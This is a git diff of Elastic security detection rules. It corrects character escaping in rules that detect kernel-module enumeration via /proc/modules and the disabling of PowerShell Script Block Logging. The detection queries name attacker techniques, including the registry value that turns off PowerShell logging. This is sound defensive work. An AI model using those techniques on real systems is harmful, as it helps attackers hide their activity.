administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_103.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_103.json index da2e5bf604f..7dfb70b8cb5 100644 --- a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_103.json +++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_103.json @@ -22,7 +22,7 @@ "host.id", "process.executable" ], - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "host.os.type:linux and event.category:file and event.action:\"opened-file\" and file.path:\"/proc/modules\"\n", "required_fields": [ { @@ -48,7 +48,7 @@ ], "risk_score": 21, "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "OS: Linux", @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_104.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_104.json index f61751937e3..e0e8adc0ec6 100644 --- a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_104.json +++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_104.json @@ -47,7 +47,7 @@ ], "risk_score": 21, "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", - "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "setup": "\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", "severity": "low", "tags": [ "OS: Linux", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_2.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_2.json index b3db371b9ef..e32ffe92f0f 100644 --- a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_2.json +++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_2.json @@ -15,7 +15,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Kernel Modules via Proc", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action == \"opened-file\" and file.path == \"/proc/modules\" and not \n(\n process.name in (\"auditbeat\", \"kmod\", \"modprobe\", \"lsmod\", \"insmod\", \"modinfo\", \"rmmod\", \"SchedulerRunner\", \"grep\") or \n process.parent.pid == 1 or process.title : \"*grep*\"\n)\n", "required_fields": [ { @@ -51,7 +51,7 @@ ], "risk_score": 21, "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_3.json b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_3.json index cf3d898f80a..c9606378b90 100644 --- a/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_3.json +++ b/packages/security_detection_engine/kibana/security_rule/80084fa9-8677-4453-8680-b891d3c0c778_3.json @@ -17,7 +17,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Kernel Modules via Proc", - "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "note": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "query": "file where host.os.type == \"linux\" and event.action == \"opened-file\" and file.path == \"/proc/modules\" and not \n(\n process.name in (\"auditbeat\", \"kmod\", \"modprobe\", \"lsmod\", \"insmod\", \"modinfo\", \"rmmod\", \"SchedulerRunner\", \"grep\") or \n process.parent.pid == 1 or process.title : \"*grep*\"\n)\n", "required_fields": [ { @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "80084fa9-8677-4453-8680-b891d3c0c778", - "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", + "setup": "This rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system.\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-w /proc/ -p r -k audit_proc\n```\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_1.json b/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_1.json index dfa2fb4bb65..7371c609a18 100644 --- a/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_1.json +++ b/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_1.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_2.json b/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_2.json index 010d2d9c277..b6a1f07d431 100644 --- a/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_2.json +++ b/packages/security_detection_engine/kibana/security_rule/800e01be-a7a4-46d0-8de9-69f3c9582b44_2.json @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/808291d3-e918-4a3a-86cd-73052a0c9bdc_1.json b/packages/security_detection_engine/kibana/security_rule/808291d3-e918-4a3a-86cd-73052a0c9bdc_1.json index d35a76c831a..d325b231d38 100644 --- a/packages/security_detection_engine/kibana/security_rule/808291d3-e918-4a3a-86cd-73052a0c9bdc_1.json +++ b/packages/security_detection_engine/kibana/security_rule/808291d3-e918-4a3a-86cd-73052a0c9bdc_1.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_100.json b/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_100.json index 62309838f5f..feaf20a57ef 100644 --- a/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_100.json +++ b/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_100.json @@ -52,7 +52,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_101.json b/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_101.json index c1925dcee3d..c6dd32066b9 100644 --- a/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_101.json +++ b/packages/security_detection_engine/kibana/security_rule/80c52164-c82a-402c-9964-852533d58be1_101.json @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_1.json b/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_1.json index 411e4222a4a..2fcf20415f0 100644 --- a/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_1.json +++ b/packages/security_detection_engine/kibana/security_rule/814d96c7-2068-42aa-ba8e-fe0ddd565e2e_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_104.json b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_104.json index 0bedca184dc..013b892a79a 100644 --- a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_104.json +++ b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_104.json @@ -17,7 +17,7 @@ "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n ) and registry.data.strings : (\"0\", \"0x00000000\")\n", "references": [ - "https://admx.help/?Category=Windows_10_2016\u0026Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" ], "related_integrations": [ { @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_105.json b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_105.json index 3abc8825da1..18c6c26dbde 100644 --- a/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_105.json +++ b/packages/security_detection_engine/kibana/security_rule/818e23e6-2094-4f0e-8c01-22d30f3506c6_105.json @@ -17,7 +17,7 @@ "note": "## Triage and analysis\n\n### Investigating PowerShell Script Block Logging Disabled\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, making it available in various environments and creating an attractive way for attackers to execute code.\n\nPowerShell Script Block Logging is a feature of PowerShell that records the content of all script blocks that it processes, giving defenders visibility of PowerShell scripts and sequences of executed commands.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense for the user to use PowerShell to complete tasks.\n- Investigate if PowerShell scripts were run after logging was disabled.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Related rules\n\n- PowerShell Suspicious Discovery Related Windows API Functions - 61ac3638-40a3-44b2-855a-985636ca985e\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n- PowerShell Suspicious Script with Audio Capture Capabilities - 2f2f4939-0b34-40c2-a0a3-844eb7889f43\n- Potential Process Injection via PowerShell - 2e29e96a-b67c-455a-afe4-de6183431d0d\n- Suspicious .NET Reflection via PowerShell - e26f042e-c590-4e82-8e05-41e81bd822ad\n- PowerShell Suspicious Payload Encoded and Compressed - 81fe9dc6-a2d7-4192-a2d8-eed98afc766a\n- PowerShell Suspicious Script with Screenshot Capabilities - 959a7353-1129-4aa7-9084-30746b256a70\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path : (\n \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ScriptBlockLogging\\\\EnableScriptBlockLogging\"\n ) and registry.data.strings : (\"0\", \"0x00000000\")\n", "references": [ - "https://admx.help/?Category=Windows_10_2016\u0026Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" + "https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScriptBlockLogging" ], "related_integrations": [ { @@ -64,7 +64,7 @@ ], "threat": 